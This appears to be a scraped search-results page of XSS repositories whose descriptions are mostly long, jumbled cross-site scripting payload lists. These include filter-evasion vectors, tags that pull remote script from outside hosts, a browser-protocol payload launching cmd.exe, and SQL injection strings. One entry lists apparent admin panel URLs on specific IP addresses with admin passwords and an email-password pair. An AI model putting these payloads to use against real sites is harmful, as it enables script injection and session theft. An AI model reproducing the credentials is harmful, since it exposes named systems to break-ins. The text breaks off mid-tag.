Found 20 repositories(showing 20)
lwzSoviet
Faster xss scanner,support reflected-xss and dom-xss
YassineFaidi
XSS vulnerability detection using LSTM neural networks
-- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=javascript:a& #0000108ert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="width: expression(alert('XSS'));"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Testbug
phpinfo.php jagadeeshwarreddy.godala@gmail.com P@ssword1 %0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E "><script>alert(888)</script> "><script>alert(document.domain)</script> <%script>alert(‘XSS’)<%/script> %uff1cscript%uff1ealert(9);%uff1c/script%uff1e '/><script>alert('111111')</script> <%tag style=”xss:expression(alert(‘XSS’))”> ' onmouseover=prompt(929623) bad=' %0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E 1<ScRiPt>prompt("XSS FOUND")</ScRiPt> 1<ScRiPt>prompt(968886)</ScRiPt> '>><marquee><h1>alert(XSS)</h1></marquee> <body oninput=confirm(123)><input autofocus> '';!--"<XSS>=&{()} <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> "onmouseover=prompt(959295)> "%20onmouseover=prompt(908001)%20bad=" <A onmouseover=alert('XSS') >Click me</A> <A onmouseover=confirm('XSS') >Click me</A> “0'; waitfor delay '0:0:25' – admin'or '1' = '1' <script>alert("XSS");</script> </TITLE><SCRIPT>alert("XSS");</SCRIPT> \ "><script>alert(444)</script> %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E 223E3C7363726970743E616C65727428343434293C2F7363726970743E <script>alert(String.fromCharCode(88,83,83))</script> '/<iframe src="http://www.kaneva.com"/></iframe> "<iframe name="iframe1" src=http://www.google.com/" ></iframe> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> Bapatla'=sleep(6.896)=' http://203.123.33.197/bbnl/content/ Admin Panel http://203.123.33.197/bbnl/auth/adminPanel/index.php Super Admin User Name: admin Password: Admin@1234 protected function _js_link_removal($match) { //echo "in link removal"; return str_replace($match[1], preg_replace('#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|<script|<xss|data\s*:)#si', '', $this->_filter_attributes(str_replace(array('<', '>'), '', $match[1])) ), $match[0]); } 0e9a22edc7c74851bd1c09749c0915fa <DIV STYLE="width: expression(Confirm('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> : http://203.110.84.86:2056/_layouts/PowerGrid/user/index.aspx , http://203.110.84.86:2056/_layouts/PowerGrid/admin/loginpage.aspx <IMG SRC="<ScRiPt>prompt("XSS FOUND")</ScRiPt"> admin Admin@1234 (http://164.100.140.21/rkvyodisha) %3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E <IMG SRC="jav ascript:alert('XSS');"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> \";alert('XSS');// "><script>alert(document.domain)</script> "><img src='dsfs.jpg'onerror=javascript:alert(2)> <script src=http://yoursite.com/xssshell/xssshell.asp></script> <A HREF="//www.filehippo.com/">XSS</A> <svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 /><animate attributeName=xlink:href values=;javas	cript:confirm(1) /> <a href="/user/foo" onmouseover="alert(document.domain)">foo" onmouseover="alert(1) "><img src=x onerror=confirm('1') /> '+alert('Hllo')&&null==' "><img src=dsfs.jpg'confirm=('XSS') /> confirm('XSS') <h1><font color="#00FF00">onerror=javascript:alert(2)</font></h1> <IMG SRC='vbscript:msgbox("XSS")'> <input type="text" name="search" value=""><script>alert(1)</script>"> """""""><script>alert(1)</script> http;//test.com<script>alert(document.cookie)</script>> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} '';!--"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> <xss:xss>XSS</xss:xss> </HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <BR SIZE="&{alert('XSS')}"> < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <IMG SRC=javascript:alert('XSS')> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')"> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6	6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<script>alert('xss')</script> <script>alert(string.fromcharcode(88,83,83))</script> </title><script>alert(1)</script> '> <script>alert(3)</script> `> <script>alert(5)</script> > <script>alert(4)</script> </title><script>alert(1)</script> <<script>alert("xss");//<</script> >"' '';!--"<XSS>=&{()} */a=eval;b=alert;a(b(/e/.source));/* '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")> perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <DIV STYLE="background-image: url(http://ha.ckers.org/xss.js)">Div Body</DIV> alert(1) A=alert;A(1) +alert(0)+ ';//%0da=eval;b=alert;a(b(9));// a=1;a=eval;b=alert;a(b(11));// '};a=eval;b=alert;a(b(13));// 1};a=eval;b=alert;a(b(14));// '];a=eval;b=alert;a(b(15));// 1];a=eval;b=alert;a(b(17));// 1;a=eval;b=alert;a(b(/c/.source)); xyz onerror=alert(6); > XSS | Replacive Fuzzers >>This is a comment line to be changed in the future <img src=`x` onrerror= ` ;; alert(1) ` /> </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> style=color: expression(alert(0));" a=" vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> <DIV STYLE="width: expression(alert('XSS'));"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> <IMG SRC="javascript:alert('XSS')" <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <IMG SRC="javascript:alert('XSS');"> <IMG SRC='vbscript:msgbox("XSS")'> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <IMG SRC=javascript:alert('XSS')> <IMGSRC="javascript:alert('XSS')"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <IMG SRC="  javascript:alert('XSS');"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <IMG SRC=javascript:alert('XSS')> firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> > XSS | Replacive Fuzzers >>This is a comment line to be changed in the future (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <SCRIPT SRC=http://ha.ckers.org/xss.js <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="//google">XSS</A> <IFRAME SRC=http://ha.ckers.org/scriptlet.html < y=<a>alert</a>;content[y](123) sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" with(document.__parent__)alert(1) style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" style=color: expression(alert(0));" a=" style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s> ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} '';!--"<script>alert(0);</script>=&{(alert(1))} </title><script>alert(1)</script> </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> '';!--"<XSS>=&{()} <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=`javascript:alert("XSS says, 'XSS'")`> <IMG """><SCRIPT>alert("XSS")</SCRIPT>">", <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert(<WBR>'XSS');"> <IMG SRC="jav
ascript:alert(<WBR>'XSS');"> /XSS STYLE=xss:expression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> XSS-STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> "><script>alert('XSS')</script> <xml id=i><x><c><![cdata[<img src="javas]]><![cdata[cript:alert('xss');">]]></c></x></xml><span datasrc=#i datafld=c dataformatas=html> <xml id="xss"><i><b><img src="javas<!-- -->cript:alert('xss')"></b></i></xml><span datasrc="#xss" datafld="b" dataformatas="html"></span> <html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="xss<script defer>alert('xss')</script>"> </body></html> <html xmlns:xss><?import namespace="xss" implementation="httP://ha.ckers.org/xss.htc"><xss:xss>xss</xss:xss></html> <xml src="httP://ha.ckers.org/xsstest.xml" id=i></xml><span datasrc=#i datafld=c dataformatas=html></span> <?xml version="1.0"?><html:html xmlns:html='httP://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html> aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 <body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; <body onload=a1={x:this.parent.document};a1.x.writeln(1);> <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; <body/s/onload=x={doc:parent.document};x.doc.writeln(1) <body/????$/onload=x={doc:parent[�document�]};x.doc.writeln(1) <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <!--#exec cmd=""/usr/X11R6/bin/xterm ?display 127.0.0.1:0 &""--> httP://aa"><script>alert(123)</script> httP://aa'><script>alert(123)</script> httP://aa<script>alert(123)</script> <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://testsite.com/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <STYLE 